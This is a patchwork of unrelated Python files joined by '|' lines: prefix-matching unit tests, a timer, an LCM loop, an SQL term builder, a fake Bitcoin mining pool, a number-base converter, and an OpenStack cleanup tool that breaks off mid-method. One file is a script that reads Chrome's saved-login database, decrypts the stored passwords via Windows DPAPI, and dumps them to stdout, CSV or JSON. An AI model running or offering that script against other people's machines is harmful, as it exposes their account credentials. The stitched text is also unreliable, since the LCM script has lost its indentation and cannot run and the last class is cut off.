    gcp = GreatestCommonPrefix()

    def test_pine_match(self):
        assert self.gcp.parse(['pineapple', 'pine tree']) == 'pine'

    def test_pine_miss(self):
        # A leading space on only one line kills the common prefix.
        assert self.gcp.parse([' pineapple', 'pine tree']) == ''

    def test_indented_match(self):
        assert self.gcp.parse([' chicken', ' chickpea']) == ' chick'

    def test_same_match(self):
        assert self.gcp.parse(['dog', 'dog']) == 'dog'

    def test_whole_word_match(self):
        assert self.gcp.parse(['stack', 'stacked']) == 'stack'

    def test_whole_word_match_reordered(self):
        # Order of the lines must not matter.
        assert self.gcp.parse(['stacked', 'stack']) == 'stack'

    def test_empty_strings(self):
        assert self.gcp.parse(['', '']) == ''

    def test_single_item(self):
        assert self.gcp.parse(['single']) == 'single'

    def test_many_match(self):
        words = ['single', 'singleton', 'singing', 'singed', 'sine']
        assert self.gcp.parse(words) == 'sin'
class TestWhiteSpaceWhiteList:
    """Whitelist restricted to whitespace: only blank prefixes survive."""
    gcp = GreatestCommonPrefix(whitelist=' \t\r\n')

    def test_spaces(self):
        assert self.gcp.parse([' pineapple', ' pine tree']) == ' '

    def test_four_spaces_tab_no_match(self):
        # Spaces and tabs do not match each other.
        assert self.gcp.parse([' pineapple', '\tpine tree']) == ''

    def test_eight_spaces_tab_no_match(self):
        assert self.gcp.parse([' pineapple', '\tpine tree']) == ''

    def test_different_line_endings_no_match(self):
        assert self.gcp.parse(['\r\n', '\n']) == ''

    def test_alternating_allowed(self):
        # Prefix stops at the first non-whitelisted character.
        assert self.gcp.parse(['\tW\tW', '\tW\tW']) == '\t'

    def test_same_word_blacklisted(self):
        # Identical lines still yield nothing if no character is whitelisted.
        assert self.gcp.parse(['test', 'test']) == ''
class TestWhiteList:
    """Letter whitelist: the prefix may only contain 'p', 'l' and 'a'."""
    gcp = GreatestCommonPrefix(whitelist='pla')

    def test_partial_match(self):
        assert self.gcp.parse(['appliance', 'applicable']) == 'appl'

    def test_full_match(self):
        assert self.gcp.parse(['pal', 'pal']) == 'pal'

    def test_no_match(self):
        # None of 'd', 'o', 'g' is whitelisted.
        assert self.gcp.parse(['dog', 'dog']) == ''
class TestRegex:
    """Prefix constrained to quotes surrounded by optional blanks."""
    gcp = GreatestCommonPrefix(regex=r"[ \t]*'+[ \t]*")

    def test_one_single_quote(self):
        assert self.gcp.parse(["'' test", "' test"]) == "'"

    def test_space_no_quote(self):
        assert self.gcp.parse([' pineapple', 'pine tree']) == ''

    def test_spaces_no_quote(self):
        # Indentation alone does not satisfy the quote regex.
        assert self.gcp.parse([' chicken', ' chickpea']) == ''

    def test_spaces_quote(self):
        assert self.gcp.parse([" 'chicken", " 'chickpea"]) == " '"

    def test_spaces_quote_tab(self):
        assert self.gcp.parse([" '\tchicken", " '\tchickpea"]) == " '\t"

    def test_same_word_no_match(self):
        assert self.gcp.parse(["dog", "dog"]) == ""

    def test_quoted_word_single_quotes(self):
        assert self.gcp.parse(["'stack'", "'stacked'"]) == "'"

    def test_quoted_word_double_quotes(self):
        # Double quotes are not part of the regex.
        assert self.gcp.parse(['"stack"', '"stacked"']) == ""
|
import time
class Timer:
    """Named stopwatch that reports elapsed time in a chosen unit.

    interval: 'ms' (milliseconds), 's' (seconds, the default) or 'm'
    (minutes). Unknown codes raise ValueError immediately — previously
    they silently left ``self.interval`` unset and ``read()`` failed
    later with AttributeError.
    """

    # Seconds per unit for each supported interval code.
    _INTERVALS = {'ms': .001, 's': 1, 'm': 60}

    def __init__(self, name, interval='s'):
        if not name.replace(' ', '').isalnum():
            raise ValueError('Device names must only contain letters, numbers and spaces')
        if interval not in self._INTERVALS:
            raise ValueError("interval must be one of 'ms', 's' or 'm'")
        self.start_time()
        self.name = name
        self.interval = self._INTERVALS[interval]

    def start_time(self):
        """Reset the reference point to now."""
        self.start = time.time()

    def read(self):
        """Return time elapsed since start, expressed in the chosen unit."""
        return (time.time() - self.start) / self.interval
|
from itertools import count
# if i % 20 == 0:
# if i % 19 == 0:
# if i % 18 == 0:
# if i % 17 == 0:
# if i % 16 == 0:
# if i % 15 == 0:
# if i % 14 == 0:
# if i % 13 == 0:
# if i % 12 == 0:
# if i % 11 == 0:
# if i % 10 == 0:
# if i % 9 == 0:
# if i % 8 == 0:
# if i % 7 == 0:
# if i % 6 == 0:
# if i % 5 == 0:
# if i % 4 == 0:
# if i % 3 == 0:
# if i % 2 == 0:
# num = i
# break
i = 1
for k in (range(1,21)):
if i % k > 0:
for j in range(1, 21):
# if i is not divisible by k, then multiply it by each number until it is divisible
if (i*j) % k == 0:
# set i to that value and go to next value
i *= j
break
print(i)
|
from mathml.termbuilder import tree_converters, InfixTermBuilder
__all__ = [ 'SqlTermBuilder' ]
class SqlTermBuilder(InfixTermBuilder):
    """Term builder that renders math terms as SQL expressions."""

    # Constant names that have a direct SQL spelling.
    _NAME_MAP = {
        'e'     : 'exp(1.0)',
        'pi'    : 'pi()',
        'true'  : 'TRUE',
        'false' : 'FALSE'
        }

    def _handle_const_bool(self, operator, operands, affin):
        # Replaced the legacy `x and 'TRUE' or 'FALSE'` idiom with a real
        # conditional expression (identical behavior: 'TRUE' is truthy).
        return [ 'TRUE' if operands[0] else 'FALSE' ]

    def _handle_const_complex(self, operator, operands, affin):
        raise NotImplementedError("Complex numbers cannot be converted to SQL.")

    def _handle_interval(self, operator, operands, affin):
        raise NotImplementedError("Intervals cannot be converted to SQL.")

# Make the builder available as the 'sql' converter.
tree_converters.register_converter('sql', SqlTermBuilder())
|
"""
A fake pool that only serves one getwork, meant for local testing
"""
import gevent.pywsgi
import os, logging, json
def handle_getwork():
    """Serve the single canned getwork result as a JSON-RPC response."""
    work = {
        "midstate": "5fa3febd7c47f69762101eb58f7e07f86414f6cddab264ea29e979e93a681af3",
        "target": "ffffffffffffffffffffffffffffffffffffffffffffffffffffffff00000000",
        "data": "0000000141eb2ea2dff39b792c3c4112408b930de8fb7e3aef8a75f400000709000000001d716842411d0488da0d1ccd34e8f3e7d5f0682632efec00b80c7e3f84e175854fb7bead1a09ae0200000000000000800000000000000000000000000000000000000000000000000000000000000000000000000000000080020000",
        "hash1": "00000000000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000010000",
    }
    return json.dumps({"id": 1, "error": None, "result": work})
def handle_submit():
    """Acknowledge any submitted share as accepted."""
    return json.dumps(dict(result=True, id=1, error=None))
def read_input(env):
    """Drain the WSGI input stream and return its full contents as one string.

    Fixes: ``a == None`` replaced by the ``not chunk`` truthiness test
    (covers both None and empty), and the quadratic ``+=`` string
    accumulation replaced by a join.
    """
    stream = env['wsgi.input']
    chunks = []
    while True:
        chunk = stream.read()
        if not chunk:  # None or zero-length: stream exhausted
            break
        chunks.append(chunk)
    return "".join(chunks)
def initialize():
    """Start the fake pool on 127.0.0.1:8338 in a background greenlet."""
    devnull = open(os.devnull, 'wb')  # discard the WSGI access log
    pool = gevent.pywsgi.WSGIServer(('127.0.0.1', 8338), serve, log=devnull)
    gevent.spawn(pool.serve_forever)
def serve(env, start_response):
    """WSGI entry point: non-empty 'params' means a share submission,
    anything else is answered with the canned getwork."""
    start_response('200 OK', [])
    request = json.loads(read_input(env))
    if request['params'] != []:
        return handle_submit()
    return handle_getwork()
|
from .binary import BinaryCommand, BinaryDevice, BinaryReply, BinarySerial
from .exceptions import TimeoutError, UnexpectedReplyError
|
import os
import sys
import sqlite3
import csv
import json
import argparse
try:
    import win32crypt  # Windows-only; used by main() to decrypt passwords
except ImportError:
    # Not on Windows (or pywin32 missing). main() only touches win32crypt
    # when os.name == 'nt', so this is safe to ignore elsewhere.
    # (Was a bare `except:`, which would also hide unrelated errors.)
    pass
def args_parser():
    """Parse CLI options and dispatch to the dump / CSV / JSON actions.

    Prints the usage message only when no action was requested. (Bug fix:
    previously ``--dump`` alone still fell through to ``print_help()``
    because the trailing ``else`` was attached to the JSON check.)
    """
    parser = argparse.ArgumentParser(
        description="Retrieve Google Chrome Passwords")
    parser.add_argument("-o", "--output", choices=['csv', 'json'],
                        help="Output passwords to [ CSV | JSON ] format.")
    parser.add_argument(
        "-d", "--dump", help="Dump passwords to stdout. ", action="store_true")
    args = parser.parse_args()

    handled = False
    if args.dump:
        for data in main():
            print(data)
        handled = True
    if args.output == 'csv':
        output_csv(main())
        handled = True
    elif args.output == 'json':
        output_json(main())
        handled = True
    if not handled:
        parser.print_help()
def main():
    """Read saved Chrome logins from the local profile database.

    Returns a list of dicts with origin_url/username/password keys.
    On Windows the password blob is decrypted via win32crypt; on OS X
    the program bails out. Database errors are reported and exit(0).
    """
    results = []
    profile_dir = getpath()
    try:
        connection = sqlite3.connect(profile_dir + "Login Data")
        with connection:
            cursor = connection.cursor()
            rows = cursor.execute(
                'SELECT action_url, username_value, password_value FROM logins').fetchall()
            if (os.name == "posix") and (sys.platform == "darwin"):
                print("Mac OSX not supported.")
                sys.exit(0)
            for origin_url, username, password in rows:
                if os.name == 'nt':
                    # DPAPI-protected blob; index 1 is the decrypted value.
                    password = win32crypt.CryptUnprotectData(
                        password, None, None, None, 0)[1]
                if password:
                    results.append({
                        'origin_url': origin_url,
                        'username': username,
                        'password': str(password)
                    })
    except sqlite3.OperationalError as e:
        message = str(e)
        if message == 'database is locked':
            print('[!] Make sure Google Chrome is not running in the background')
        elif message == 'no such table: logins':
            print('[!] Something wrong with the database name')
        elif message == 'unable to open database file':
            print('[!] Something wrong with the database path')
        else:
            print(message)
        sys.exit(0)
    return results
def getpath():
    """Return the Chrome profile directory for this platform (trailing
    separator included), exiting if the directory does not exist.

    Bug fix: the ``if sys.platform == "darwin"`` line was missing its
    colon, which made the whole module a SyntaxError.
    """
    if os.name == "nt":
        # This is the Windows Path
        PathName = os.getenv('localappdata') + \
            '\\Google\\Chrome\\User Data\\Default\\'
    elif os.name == "posix":
        PathName = os.getenv('HOME')
        if sys.platform == "darwin":
            # This is the OS X Path
            PathName += '/Library/Application Support/Google/Chrome/Default/'
        else:
            # This is the Linux Path
            PathName += '/.config/google-chrome/Default/'
    if not os.path.isdir(PathName):
        print('[!] Chrome Doesn\'t exists')
        sys.exit(0)
    return PathName
def output_csv(info):
    """Write credential dicts to chromepass-passwords.csv (UTF-8 bytes)."""
    try:
        with open('chromepass-passwords.csv', 'wb') as csv_file:
            csv_file.write('origin_url,username,password \n'.encode('utf-8'))
            for entry in info:
                row = '%s, %s, %s \n' % (entry['origin_url'],
                                         entry['username'], entry['password'])
                csv_file.write(row.encode('utf-8'))
        print("Data written to chromepass-passwords.csv")
    except EnvironmentError:
        print('EnvironmentError: cannot write data')
def output_json(info):
    """Write credential dicts to chromepass-passwords.json under the
    'password_items' key."""
    try:
        with open('chromepass-passwords.json', 'w') as json_file:
            json.dump({'password_items': info}, json_file)
        print("Data written to chromepass-passwords.json")
    except EnvironmentError:
        print('EnvironmentError: cannot write data')
# Script entry point: parse flags and run the requested action.
if __name__ == '__main__':
    args_parser()
|
import argparse
import string
def dec_to_bin(dec, verbose=False):
    """Recursively build the binary string of a non-negative decimal.

    Returns '' for 0 — the recursion relies on that base case, so e.g.
    dec_to_bin(5) == '101' but dec_to_bin(0) == '' (main() filters 0 out
    via its truthiness check). Python 2 code: uses print statements.
    """
    rest = dec % 2  # least-significant bit of the current value
    if int(dec) != 0:
        if verbose == True:
            print "%s \t:\t 2 = %s \t-- Rest: %s" % (dec,int(dec/2),rest)
            verbose = True
        binary = str(dec_to_bin(int(dec/2),verbose)) + str(rest)
        return binary
    else:
        return ""
def dec_to_hex(dec, verbose=False):
    """Recursively build the hexadecimal string of a non-negative decimal.

    Remainders 10-15 are mapped to letters A-F. Returns '' for 0 (the
    recursion base case). Python 2 code: uses print statements.
    """
    # Decimal remainder -> hex letter for digits above 9.
    substitution = {
        "10" : "A",
        "11" : "B",
        "12" : "C",
        "13" : "D",
        "14" : "E",
        "15" : "F"
    }
    rest = str(dec % 16)
    if rest in substitution:
        rest = rest.replace(rest,substitution[rest])
    if int(dec) != 0:
        if verbose == True:
            print "%s \t:\t 16 = %s \t-- Rest: %s" % (dec,int(dec/16),rest)
            verbose = True
        hexa = str(dec_to_hex(int(dec/16),verbose)) + str(rest)
        return hexa
    else:
        return ""
def bin_to_dec(binary):
    """Convert a binary number (str or int of 0/1 digits) to its decimal value."""
    # Walk the digits least-significant first, weighting each by 2**position.
    return sum(int(digit) * (2 ** position)
               for position, digit in enumerate(str(binary)[::-1]))
def hex_to_dec(hexa):
    """Convert a hexadecimal number (str or int, case-insensitive) to decimal."""
    # Letter digits and their decimal values (as strings, like the digits
    # themselves, so a single int() handles both cases below).
    letter_value = {
        "a": "10", "b": "11", "c": "12",
        "d": "13", "e": "14", "f": "15"
    }
    total = 0
    # Least-significant digit first, weighting each by 16**position.
    for position, ch in enumerate(str(hexa)[::-1].lower()):
        total += int(letter_value.get(ch, ch)) * (16 ** position)
    return total
def hex_to_bin(hexa, verbose=False):
    """Hexadecimal -> binary string, converting through decimal."""
    return dec_to_bin(hex_to_dec(hexa), verbose)
def bin_to_hex(bin, verbose=False):
    """Binary -> hexadecimal string, converting through decimal.

    NOTE(review): the parameter name shadows the builtin ``bin``; kept
    unchanged for backward compatibility with keyword callers.
    """
    return dec_to_hex(bin_to_dec(bin), verbose)
def is_binary(s):
    """Return True when every character of str(s) is '0' or '1'.

    Matches the original for-else logic, including the edge case that an
    empty string counts as binary.
    """
    return all(ch in "01" for ch in str(s))
def main():
    """CLI entry: convert between hex, binary and decimal.

    Exactly one of -H/-b/-d must be given, otherwise usage is printed.
    Python 2 code (print statements). Note the truthiness checks mean a
    decimal input of 0 also falls through to print_help().
    """
    parser = argparse.ArgumentParser(description='Covert hexadecimal, decimal and binary numbers. Use only one argument at a time.')
    parser.add_argument('-H', '--hex', type=str, help='hexadecimal number to convert', required=False, default=None)
    parser.add_argument('-b', '--binary', type=str, help='binary number to convert', required=False, default=None)
    parser.add_argument('-d', '--decimal', type=int, help='positive decimal number to convert', required=False, default=None)
    parser.add_argument('-v', '--verbose', action='store_true', required=False, default=False)
    args = parser.parse_args()
    if args.hex and not args.binary and not args.decimal:
        # Validate every character before attempting the conversion.
        if all(c in string.hexdigits for c in args.hex) == True:
            print "%s(hex) = %s(dec)\n" % (args.hex, hex_to_dec(args.hex))
            print "%s(hex) = %s(bin)\n" % (args.hex,hex_to_bin(args.hex, args.verbose))
        else:
            print "%s is not a hexadecimal." % args.hex
    elif args.binary and not args.hex and not args.decimal:
        if is_binary(args.binary) == True:
            print "%s(bin) = %s(dec)\n" % (args.binary, bin_to_dec(args.binary))
            print "%s(bin) = %s(hex)\n" % (args.binary,bin_to_hex(args.binary,args.verbose))
        else:
            print "%s is not a binary number." % args.binary
    elif args.decimal and not args.hex and not args.binary:
        if args.decimal >= 0:
            print "%s(dec) = %s(hex)\n" % (args.decimal,dec_to_hex(args.decimal,args.verbose))
            print "%s(dec) = %s(bin)\n" % (args.decimal,dec_to_bin(args.decimal,args.verbose))
        else:
            print "%s is not a postive decimal number" % args.decimal
    else:
        parser.print_help()
# Script entry point.
if __name__ == "__main__":
    main()
|
import argparse
import functools
import logging
import os
import sys
import time

import ceilometerclient.exc
from ceilometerclient.v2 import client as ceilometer_client
import cinderclient.exceptions
from cinderclient.v1 import client as cinder_client
import glanceclient.exc
from glanceclient.v1 import client as glance_client
from heatclient import client as heat_client
import heatclient.openstack.common.apiclient.exceptions
from keystoneclient.apiclient import exceptions as api_exceptions
import keystoneclient.openstack.common.apiclient.exceptions
from keystoneclient.v2_0 import client as keystone_client
import neutronclient.common.exceptions
from neutronclient.v2_0 import client as neutron_client
import novaclient.exceptions
from novaclient.v1_1 import client as nova_client
import requests
from swiftclient import client as swift_client
RETRIES = 10  # Retry a delete operation 10 times before exiting
TIMEOUT = 5  # 5 seconds timeout between retries
# Raised when the target cloud answers 404 for a whole resource type.
class ResourceNotEnabled(Exception):
    pass
# Raised by Session.get_endpoint when the catalog lacks the service type.
class EndpointNotFound(Exception):
    pass
class InvalidEndpoint(Exception):
    pass
class NoSuchProject(Exception):
    # NOTE(review): ERROR_CODE and the bare numeric constants below look
    # like process exit codes — confirm against the CLI entry point.
    ERROR_CODE = 2
AUTHENTICATION_FAILED_ERROR_CODE = 3
class DeletionFailed(Exception):
    # Raised by retry() once RETRIES attempts have failed.
    ERROR_CODE = 4
CONNECTION_ERROR_CODE = 5
NOT_AUTHORIZED = 6
# Names of the Resources subclasses defined below.
# NOTE(review): the ordering appears deliberate (snapshots before volumes,
# LB members before pools, interfaces before routers/networks) — confirm it
# encodes deletion dependencies before reordering.
RESOURCES_CLASSES = ['CinderSnapshots',
                     'CinderBackups',
                     'NovaServers',
                     'NeutronFloatingIps',
                     'NeutronFireWall',
                     'NeutronFireWallPolicy',
                     'NeutronFireWallRule',
                     'NeutronLbMembers',
                     'NeutronLbVip',
                     'NeutronLbHealthMonitor',
                     'NeutronLbPool',
                     'NeutronMeteringLabel',
                     'NeutronInterfaces',
                     'NeutronRouters',
                     'NeutronPorts',
                     'NeutronNetworks',
                     'NeutronSecgroups',
                     'GlanceImages',
                     'SwiftObjects',
                     'SwiftContainers',
                     'CinderVolumes',
                     'CeilometerAlarms',
                     'HeatStacks']
def retry(service_name):
    """Build a decorator factory that retries a deletion call on failure.

    A 404 (``http_status``) from the service means the resource is already
    gone: log a warning and stop. Any other exception is retried up to
    RETRIES times with TIMEOUT seconds between attempts, after which
    DeletionFailed(service_name) is raised.
    """
    def factory(func):
        """Decorator allowing to retry in case of failure."""
        @functools.wraps(func)  # fix: preserve the wrapped function's metadata
        def wrapper(*args, **kwargs):
            attempt = 0
            while True:
                try:
                    return func(*args, **kwargs)
                except Exception as e:
                    if getattr(e, 'http_status', False) == 404:
                        # Sometimes a resource can be deleted manually by
                        # someone else while ospurge is running and listed it.
                        # If this happens, We raise a Warning.
                        logging.warning(
                            "Can not delete the resource because it does not"
                            " exist : %s" % e
                        )
                        # No need to retry deleting a non existing resource
                        break
                    if attempt == RETRIES:
                        raise DeletionFailed(service_name)
                    attempt += 1
                    logging.info("* Deletion failed - "
                                 "Retrying in {} seconds - "
                                 "Retry count {}".format(TIMEOUT, attempt))
                    time.sleep(TIMEOUT)
        return wrapper
    return factory
class Session(object):
    """A Session stores information that can be used by the different Openstack Clients.
    The most important data is:
    * self.token - The Openstack token to be used accross services;
    * self.catalog - Allowing to retrieve services' endpoints.
    """
    def __init__(self, username, password, project_id, auth_url,
                 endpoint_type="publicURL", region_name=None, insecure=False):
        # Authenticate once against Keystone; the token and service catalog
        # obtained here are shared by the per-service clients.
        client = keystone_client.Client(
            username=username, password=password, tenant_id=project_id,
            auth_url=auth_url, region_name=region_name, insecure=insecure)
        # Storing username, password, project_id and auth_url for
        # use by clients libraries that cannot use an existing token.
        self.username = username
        self.password = password
        self.project_id = project_id
        self.auth_url = auth_url
        self.region_name = region_name
        self.insecure = insecure
        # Session variables to be used by clients when possible
        self.token = client.auth_token
        self.user_id = client.user_id
        self.project_name = client.project_name
        self.endpoint_type = endpoint_type
        self.catalog = client.service_catalog.get_endpoints()
    def get_endpoint(self, service_type):
        """Return the first catalog endpoint of `service_type` matching the
        configured endpoint type; raises EndpointNotFound when absent."""
        try:
            return self.catalog[service_type][0][self.endpoint_type]
        except (KeyError, IndexError):
            # Endpoint could not be found
            raise EndpointNotFound(service_type)
class Resources(object):
    """Abstract base class for all resources to be removed."""

    def __init__(self, session):
        self.session = session

    def list(self):
        # Subclasses return the iterable of resources to act on.
        pass

    def delete(self, resource):
        """Displays informational message about a resource deletion."""
        logging.info("* Deleting {}.".format(self.resource_str(resource)))

    def purge(self):
        """Delete all resources."""
        # Purging is displayed and done only if self.list succeeds.
        to_delete = self.list()
        kind = self.__class__.__name__
        logging.info("* Purging {}".format(kind))
        for item in to_delete:
            # Each deletion is wrapped in the retry decorator.
            retry(kind)(self.delete)(item)

    def dump(self):
        """Display all available resources."""
        # Resources type and resources are displayed only if self.list succeeds.
        to_show = self.list()
        print("* Resources type: {}".format(self.__class__.__name__))
        for item in to_show:
            print(self.resource_str(item))
        print("")
class SwiftResources(Resources):
    """Base for Swift-backed resources; holds the endpoint, token and a
    reusable HTTP connection."""
    def __init__(self, session):
        super(SwiftResources, self).__init__(session)
        self.endpoint = self.session.get_endpoint("object-store")
        self.token = self.session.token
        # swiftclient's http_conn parameter expects a (parsed_url, conn)
        # pair, which lets the calls below reuse this connection.
        conn = swift_client.HTTPConnection(self.endpoint, insecure=self.session.insecure)
        self.http_conn = conn.parsed_url, conn
    # This method is used to retrieve Objects as well as Containers.
    def list_containers(self):
        """Yield the name of every container in the account."""
        containers = swift_client.get_account(self.endpoint, self.token, http_conn=self.http_conn)[1]
        return (cont['name'] for cont in containers)
class SwiftObjects(SwiftResources):
    def list(self):
        """Collect every object from every container of the account."""
        found = []
        for container in self.list_containers():
            listing = swift_client.get_container(
                self.endpoint, self.token, container, http_conn=self.http_conn)[1]
            found.extend({'container': container, 'name': entry['name']}
                         for entry in listing)
        return found

    def delete(self, obj):
        super(SwiftObjects, self).delete(obj)
        swift_client.delete_object(self.endpoint, token=self.token,
                                   http_conn=self.http_conn,
                                   container=obj['container'], name=obj['name'])

    def resource_str(self, obj):
        return "object {} in container {}".format(obj['name'], obj['container'])
class SwiftContainers(SwiftResources):
    def list(self):
        """All container names in the account."""
        return self.list_containers()

    def delete(self, container):
        """Container must be empty for deletion to succeed."""
        super(SwiftContainers, self).delete(container)
        swift_client.delete_container(self.endpoint, self.token, container,
                                      http_conn=self.http_conn)

    def resource_str(self, obj):
        return "container {}".format(obj)
class CinderResources(Resources):
    """Base for Cinder-backed resources; owns the cinder client."""
    def __init__(self, session):
        super(CinderResources, self).__init__(session)
        # Cinder client library can't use an existing token. When
        # using this library, we have to reauthenticate.
        # NOTE(review): session.insecure is passed positionally as the
        # client's fifth argument — confirm it lands on `insecure`.
        self.client = cinder_client.Client(
            session.username, session.password,
            session.project_name, session.auth_url, session.insecure,
            endpoint_type=session.endpoint_type,
            region_name=session.region_name)
class CinderSnapshots(CinderResources):
    def list(self):
        """All volume snapshots visible to the project."""
        return self.client.volume_snapshots.list()

    def delete(self, snap):
        super(CinderSnapshots, self).delete(snap)
        self.client.volume_snapshots.delete(snap)

    def resource_str(self, snap):
        return "snapshot {} (id {})".format(snap.display_name, snap.id)
class CinderVolumes(CinderResources):
    def list(self):
        """All volumes visible to the project."""
        return self.client.volumes.list()

    def delete(self, vol):
        """Snapshots created from the volume must be deleted first."""
        super(CinderVolumes, self).delete(vol)
        self.client.volumes.delete(vol)

    def resource_str(self, vol):
        return "volume {} (id {})".format(vol.display_name, vol.id)
class CinderBackups(CinderResources):
    def list(self):
        """All volume backups visible to the project."""
        return self.client.backups.list()

    def delete(self, backup):
        super(CinderBackups, self).delete(backup)
        self.client.backups.delete(backup)

    def resource_str(self, backup):
        return "backup {} (id {}) of volume {}".format(backup.name, backup.id, backup.volume_id)
class NeutronResources(Resources):
    """Base for Neutron-backed resources; owns the neutron client and the
    project-ownership filter shared by all subclasses."""
    def __init__(self, session):
        super(NeutronResources, self).__init__(session)
        self.client = neutron_client.Client(
            username=session.username, password=session.password,
            tenant_id=session.project_id, auth_url=session.auth_url,
            endpoint_type=session.endpoint_type,
            region_name=session.region_name, insecure=session.insecure)
        self.project_id = session.project_id
    # This method is used for routers and interfaces removal
    def list_routers(self):
        """Routers owned by the project (double-checked client side)."""
        return filter(
            self._owned_resource,
            self.client.list_routers(tenant_id=self.project_id)['routers'])
    def _owned_resource(self, res):
        # Only considering resources owned by project
        # We try to filter directly in the client.list() commands, but some 3rd
        # party Neutron plugins may ignore the "tenant_id=self.project_id"
        # keyword filtering parameter. An extra check does not cost much and
        # keeps us on the safe side.
        return res['tenant_id'] == self.project_id
class NeutronRouters(NeutronResources):
    def list(self):
        return self.list_routers()

    def delete(self, router):
        """Interfaces must be deleted first."""
        super(NeutronRouters, self).delete(router)
        router_id = router['id']
        # The gateway has to go before the router itself can be removed.
        self.client.remove_gateway_router(router_id)
        self.client.delete_router(router_id)

    @staticmethod
    def resource_str(router):
        return "router {} (id {})".format(router['name'], router['id'])
class NeutronInterfaces(NeutronResources):
    def list(self):
        # Only "router_interface" ports count as interfaces here
        # (gateways and unbound ports are handled by other classes).
        ports = self.client.list_ports(tenant_id=self.project_id)['ports']
        interfaces = [p for p in ports
                      if p["device_owner"] == "network:router_interface"]
        return filter(self._owned_resource, interfaces)

    def delete(self, interface):
        super(NeutronInterfaces, self).delete(interface)
        self.client.remove_interface_router(interface['device_id'],
                                            {'port_id': interface['id']})

    @staticmethod
    def resource_str(interface):
        return "interface {} (id {})".format(interface['name'],
                                             interface['id'])
class NeutronPorts(NeutronResources):
    # Unbound ports have device_owner == ""; a port once bound to some VM
    # carries a "compute:*" device_owner instead.
    def list(self):
        ports = self.client.list_ports(tenant_id=self.project_id)['ports']
        candidates = [p for p in ports
                      if p["device_owner"] == ""
                      or p["device_owner"].startswith("compute:")]
        return filter(self._owned_resource, candidates)

    def delete(self, port):
        super(NeutronPorts, self).delete(port)
        self.client.delete_port(port['id'])

    @staticmethod
    def resource_str(port):
        return "port {} (id {})".format(port['name'], port['id'])
class NeutronNetworks(NeutronResources):
    def list(self):
        nets = self.client.list_networks(tenant_id=self.project_id)['networks']
        return filter(self._owned_resource, nets)

    def delete(self, net):
        """Delete a Neutron network
        Interfaces connected to the network must be deleted first.
        Implying there must not be any VM on the network.
        """
        super(NeutronNetworks, self).delete(net)
        self.client.delete_network(net['id'])

    @staticmethod
    def resource_str(net):
        return "network {} (id {})".format(net['name'], net['id'])
class NeutronSecgroups(NeutronResources):
    def list(self):
        # The "default" security group cannot be removed, so it is filtered
        # out along with groups owned by other projects.
        def removable(secgroup):
            return (secgroup['name'] != 'default'
                    and self._owned_resource(secgroup))

        try:
            groups = self.client.list_security_groups(
                tenant_id=self.project_id)['security_groups']
            return filter(removable, groups)
        except neutronclient.common.exceptions.NeutronClientException as err:
            # A 404 on the listing means secgroups are not enabled at all.
            if getattr(err, "status_code", None) == 404:
                raise ResourceNotEnabled
            raise

    def delete(self, secgroup):
        """VMs using the security group should be deleted first."""
        super(NeutronSecgroups, self).delete(secgroup)
        self.client.delete_security_group(secgroup['id'])

    @staticmethod
    def resource_str(secgroup):
        return "security group {} (id {})".format(
            secgroup['name'], secgroup['id'])
class NeutronFloatingIps(NeutronResources):
    def list(self):
        fips = self.client.list_floatingips(
            tenant_id=self.project_id)['floatingips']
        return filter(self._owned_resource, fips)

    def delete(self, floating_ip):
        super(NeutronFloatingIps, self).delete(floating_ip)
        self.client.delete_floatingip(floating_ip['id'])

    @staticmethod
    def resource_str(floating_ip):
        return "floating ip {} (id {})".format(
            floating_ip['floating_ip_address'], floating_ip['id'])
class NeutronLbMembers(NeutronResources):
    def list(self):
        members = self.client.list_members(tenant_id=self.project_id)['members']
        return filter(self._owned_resource, members)

    def delete(self, member):
        super(NeutronLbMembers, self).delete(member)
        self.client.delete_member(member['id'])

    @staticmethod
    def resource_str(member):
        return "lb-member {} (id {})".format(member['address'], member['id'])
class NeutronLbPool(NeutronResources):
    def list(self):
        pools = self.client.list_pools(tenant_id=self.project_id)['pools']
        return filter(self._owned_resource, pools)

    def delete(self, pool):
        super(NeutronLbPool, self).delete(pool)
        self.client.delete_pool(pool['id'])

    @staticmethod
    def resource_str(pool):
        return "lb-pool {} (id {})".format(pool['name'], pool['id'])
class NeutronLbVip(NeutronResources):
    def list(self):
        vips = self.client.list_vips(tenant_id=self.project_id)['vips']
        return filter(self._owned_resource, vips)

    def delete(self, vip):
        super(NeutronLbVip, self).delete(vip)
        self.client.delete_vip(vip['id'])

    @staticmethod
    def resource_str(vip):
        return "lb-vip {} (id {})".format(vip['name'], vip['id'])
class NeutronLbHealthMonitor(NeutronResources):
    def list(self):
        monitors = self.client.list_health_monitors(
            tenant_id=self.project_id)['health_monitors']
        return filter(self._owned_resource, monitors)

    def delete(self, health_monitor):
        super(NeutronLbHealthMonitor, self).delete(health_monitor)
        self.client.delete_health_monitor(health_monitor['id'])

    @staticmethod
    def resource_str(health_monitor):
        # Fix: "monotor" typo in the displayed resource description.
        return "lb-health_monitor type {} (id {})".format(
            health_monitor['type'], health_monitor['id'])
class NeutronMeteringLabel(NeutronResources):
    def list(self):
        labels = self.client.list_metering_labels(
            tenant_id=self.project_id)['metering_labels']
        return filter(self._owned_resource, labels)

    def delete(self, metering_label):
        super(NeutronMeteringLabel, self).delete(metering_label)
        self.client.delete_metering_label(metering_label['id'])

    @staticmethod
    def resource_str(metering_label):
        return "meter-label {} (id {})".format(
            metering_label['name'], metering_label['id'])
class NeutronFireWallPolicy(NeutronResources):
    def list(self):
        policies = self.client.list_firewall_policies(
            tenant_id=self.project_id)['firewall_policies']
        return filter(self._owned_resource, policies)

    def delete(self, firewall_policy):
        super(NeutronFireWallPolicy, self).delete(firewall_policy)
        self.client.delete_firewall_policy(firewall_policy['id'])

    @staticmethod
    def resource_str(firewall_policy):
        return "Firewall policy {} (id {})".format(
            firewall_policy['name'], firewall_policy['id'])
class NeutronFireWallRule(NeutronResources):
    def list(self):
        rules = self.client.list_firewall_rules(
            tenant_id=self.project_id)['firewall_rules']
        return filter(self._owned_resource, rules)

    def delete(self, firewall_rule):
        super(NeutronFireWallRule, self).delete(firewall_rule)
        self.client.delete_firewall_rule(firewall_rule['id'])

    @staticmethod
    def resource_str(firewall_rule):
        return "Firewall rule {} (id {})".format(
            firewall_rule['name'], firewall_rule['id'])
class NeutronFireWall(NeutronResources):
    def list(self):
        firewalls = self.client.list_firewalls(
            tenant_id=self.project_id)['firewalls']
        return filter(self._owned_resource, firewalls)

    def delete(self, firewall):
        super(NeutronFireWall, self).delete(firewall)
        self.client.delete_firewall(firewall['id'])

    @staticmethod
    def resource_str(firewall):
